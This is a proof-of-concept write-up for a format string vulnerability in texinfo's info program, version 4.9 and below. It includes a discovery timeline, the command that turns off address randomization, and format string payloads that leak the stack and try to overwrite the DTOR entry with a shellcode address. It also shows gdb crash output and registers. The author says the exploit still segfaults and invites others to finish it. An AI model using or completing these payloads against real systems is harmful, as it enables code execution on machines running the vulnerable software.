texinfo-poc.txt

`--==+=============================================+==--  
--==+ texinfo <= 4.9 format string vuln PoC +==--  
--==+=============================================+==--  
DISCOVERED BY: Cody Rester  
WEBSITE: www.codyrester.com  
--==+=============================================+==--  
  
TIMELINE:  
--==+=============================================+==--  
11-04-2007 - Discovered bug by fuzzing the input on texinfo 4.8  
11-05-2007 - Installed via source version 4.9, bug still there  
11-06-2007 - Working on Ubuntu 7.10, Stack seems randomized, the  
offset and shellcode keeps changing locations  
11-07-2007 - Found out how to turn off randomization  
kernel.randomize_va_space = 0  
11-08-2007 - Got the correct offsets and values, but keep getting  
segfaults. Not sure what to do at this point.  
  
DETAILS:  
--==+=============================================+==--  
cypherxero@beatrix:~$ /usr/local/bin/info --file="%x %x %x %x %x %x %x %x %x %x"  
info: 0 0 8071870 2 0 0 bffff744 0 bffff6a8 805092e: No such file or directory  
cypherxero@beatrix:~$  
  
cypherxero@beatrix:~$ /usr/local/bin/info --file=BBBAAAAAB%153\$x  
info: BBBAAAAAB41414141: No such file or directory  
cypherxero@beatrix:~$  
  
--==+=============================================+==--  
SHELLCODE: 0xbffff9c7  
DTOR: 0x08068330  
OFFSET: 153   
--==+=============================================+==--  
  
cypherxero@beatrix:~$ /usr/local/bin/info --file=AAA`printf "\x30\x83\x06\x08\x31\x83\x06\x08\x32\x83\x06\x08\x33\x83\x06\x08"`%156\$43x%156\$n%156\$50x%157\$n%156\$262x%158\$n%156\$192x%159\$nA  
info: AAA0�1�2�3� 8068330 8068330 8068330 8068330A: No such file or directory  
Segmentation fault (core dumped)  
cypherxero@beatrix:~$  
  
--==+=============================================+==--  
Examining the stack with GDB  
--==+=============================================+==--  
  
(gdb) run --file=`printf "\x30\x83\x06\x08\x31\x83\x06\x08\x32\x83\x06\x08\x33\x83\x06\x08"`%154\$45x%154\$n%154\$50x%155\$n%154\$262x%156\$n%154\$192x%157\$n...  
Starting program: /usr/local/bin/info --file=`printf "\x30\x83\x06\x08\x31\x83\x06\x08\x32\x83\x06\x08\x33\x83\x06\x08"`%154\$45x%154\$n%154\$50x%155\$n%154\$262x%156\$n%154\$192x%157\$n...  
info: 0�1�2�3� 8068330 8068330 8068330 8068330...: No such file or directory  
  
Program received signal SIGSEGV, Segmentation fault.  
0x35756f3d in ?? ()  
(gdb) bt  
#0 0x35756f3d in ?? ()  
#1 0x080499ab in __do_global_dtors_aux ()  
#2 0x08062c20 in _fini ()  
#3 0xb7ff3a1f in ?? () from /lib/ld-linux.so.2  
#4 0xb8001260 in _rtld_global () from /lib/ld-linux.so.2  
#5 0x00000000 in ?? ()  
(gdb) info reg  
eax 0x8068334 134644532  
ecx 0xbffff530 -1073744592  
edx 0x35756f3d 896888637  
ebx 0x8068414 134644756  
esp 0xbffff4fc 0xbffff4fc  
ebp 0xbffff508 0xbffff508  
esi 0xb8001668 -1207953816  
edi 0x0 0  
eip 0x35756f3d 0x35756f3d  
eflags 0x210202 [ IF RF ID ]  
cs 0x73 115  
ss 0x7b 123  
ds 0x7b 123  
es 0x7b 123  
fs 0x0 0  
gs 0x33 51  
(gdb)  
--==+=============================================+==--  
CONCLUSION  
--==+=============================================+==--  
  
All offsets and values have been calculated correctly, but texinfo refuses to execute  
the shellcode address given. It doesn't look like it's overwritting the DTOR correctly,  
and the EIP is 0x35756f3d, which is not what I want. So, well, I just wanna get rid of  
it off my mind for now, I lost 8 hours of sleep last night working on this, only to have  
it time and time again fail. It's almost there, but I'm not sure how to get it working.  
Thus, the Proof-of-Concept title. Hopefully someone can take this and get an exploit  
working. Peace f00s.  
  
`